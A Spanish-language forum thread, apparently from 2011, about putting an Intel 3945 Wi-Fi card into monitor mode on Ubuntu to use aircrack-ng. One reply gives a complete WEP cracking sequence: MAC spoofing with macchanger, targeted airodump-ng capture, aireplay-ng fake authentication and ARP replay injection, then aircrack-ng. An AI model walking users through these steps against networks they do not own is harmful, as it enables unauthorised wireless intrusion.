Problemas para poner tarjeta ipw3945 en modo monitor en Ubuntu 10.10 (RESUELTO)

Iniciado por CloudswX, 28 Marzo 2011, 21:13 PM

0 Miembros y 2 Visitantes están viendo este tema.

CloudswX

Pues como siempre hago despues de buscar y buscar por toda la red acudo a este maravillosos templo de saber tratando de recibir alguna ayuda.

Sucede que tengo una tarjeta wireless con estas características:

CHIPSET      FABRICANTE       NOMBRE
ipw3945               Intel                 Intel® PRO/Wireless 3945ABG

La cual segun una lista conseguida en la web es compatible para inyectccion de paquetes desde linux..
Aca esta la lista si quieren verificar:

http://hwagm.elhacker.net/htm/tarjetas.htm

Tengo que decirles que mi tarjeta funciona muy bien para la conexion de wifi, navegar por internet, todo...
Pero resulta que quiero usar el aircrack-ng, airodump-ng, etc... Y necesito ponerla en modo monitor pero cuando intento  hacerlo me pasa lo siguiente:

cloudswx@cloudswx-TravelMate-4200:~$ iwconfig wlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
   SET failed on device wlan0 ; Operation not permitted.
cloudswx@cloudswx-TravelMate-4200:~$


Pienso que quizas sea que los driver no permiten ponerla en modo Monitor, si alguien me hecha una mano se lo agradezco.
Informacion:
Acer Travelmate 4200
Procesador Intel Centrino Core Duo 1.66
1 GB de RAM
Ubuntu 10.10

cloudswx@cloudswx-TravelMate-4200:~$ iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11abg  ESSID:off/any  
         Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm  
         Retry  long limit:7   RTS thr:off   Fragment thr:off
         Power Management:off
         
eth0      no wireless extensions.


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

dvdr

Citarsudo airmon-ng start wlan0
Citarsudo airodump-ng mon0
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg

CloudswX

#2
Gracias por la respuesta "dvdr" hice tal cual me dices y sucedio esto:




Me marca ese error porque no tengo ninguna interfaz llamada mon0 (la que debio crearse)
Como podras ver luego del recuadro azul hice un:
cloudswx@cloudswx-TravelMate-4200:~$ iwconfig

Para verificar el estado de mi interfaz

Que crees que sea, sera que me falta alguna libreria o modificar el driver?



«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

CloudswX

Pues le comento mi avance, a ver si voy bien.

cloudswx@cloudswx-TravelMate-4200:~$ sudo airmon-ng check wlan0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
781 NetworkManager
786 avahi-daemon
788 avahi-daemon
912 wpa_supplicant    (Este era el proceso que me hacia de obstaculo)
1570 dhclient


Segun leí  wpa_supplicant es una implementación libre de un solicitante IEEE 802.11i para Linux, FreeBSD, NetBSD y Windows de Microsoft. Es algo como una aplicacion que se mantiene alerta de los Beacons transmitidos por os router o AP.

Al matar este proceso paso lo siguiente:

cloudswx@cloudswx-TravelMate-4200:~$ sudo kill 912
cloudswx@cloudswx-TravelMate-4200:~$ sudo airmon-ng start wlan0

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)


entonces verifique el estado de mi interfaz y me dice que:
cloudswx@cloudswx-TravelMate-4200:~$ iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11abg  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
         
eth0      no wireless extensions.

mon0      IEEE 802.11abg  Mode:Monitor  Tx-Power=15 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Tengo una interfaz nueva "mon0".
Es decir ya tengo mi tarjeta en modo monitor   ;-)   ;-)


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

dvdr

<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg

CloudswX

#5
Pues dvdr como sabras ya he conseguido ponerla en modo monitor y empezar a capturar paquetes con Airodump..



Posteriormente comienzo a intentar crackear con los pocos IVs que he capturado:



entonces esta es la linea que me preocupa:
Opening atrapados-01.cap
Reading packets, please wait...

Quitting aircrack-ng...


Me dice QUITANDO AIRCRACK.. y no me muestra nada mas... que podra ser? me faltara algun argumento?

De todas formas seguire leyendo e investigando..

PD: La red que intento crackear es de mi familia, pertenece a un establecimiento mi hermana, por lo que no estoy practicando nada ilegal, solo quiero testear la seguridad de nuestra red wifi.




«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

dvdr

te van chapar el post  esta proivido las macc

MIRA PARA QUE TENGAS UNA TERMINAL DANDOLE CLIP AL RRATON PARA QUE SEA MAS FACIL USARLO  Y TE HECHARA LAS CAPTURAS AL ESCRITORIO Y ABRIR CARPETAS COMO ADMINISTRADOR
TIPEAS
Citarsudo apt-get install nautilus-open-terminal
Citarsudo apt-get install nautilus-gksu
Citarkillall nautilus

Y AHORA LO HACES DE LA CONSOLA DEL RRATON

te esta marcando para que elijas pero nose los pasos ni los comandos que seguiste veo que quieres el canal 8


tipea
Citarsudo apt-get install macchanger

cuando lo instales te desconectas y tipea

Citarsudo airmon-ng stop wlan0
Citarsudo ifconfig wlan0 down
Citarsudo macchanger --mac 00:11:22:33:44:55 wlan0
Citarsudo airmon-ng start wlan0
Citarsudo airodump-ng mon0

cuando la veas controll +c y pones
Citarsudo airodump-ng -c 8 --bssid 00:1F:1F:20:C0:12 -w captura mon0

ya estara capturando

abres otra terminal
pones
Citarsudo aireplay-ng -1 0 -a 00:1F:1F:20:C0:12 -h 00:11:22:33:44:55 mon0
cuando te de la salida le pones esto
Citarsudo aireplay-ng -3 -b 00:1F:1F:20:C0:12 -h 00:11:22:33:44:55 mon0

y abres otra termina para atacarla y tipeas
Citarsudo aircrack-ng -z *.cap

es el archivo de capturas que creamos antes


BORRA LOS BSSID cloudswx


<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg

CloudswX

borrare las macs tan pronto llegue a mi casa, no lo hago ahora mismo pues estoy navegando por el celular.

Gracias por todo.


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx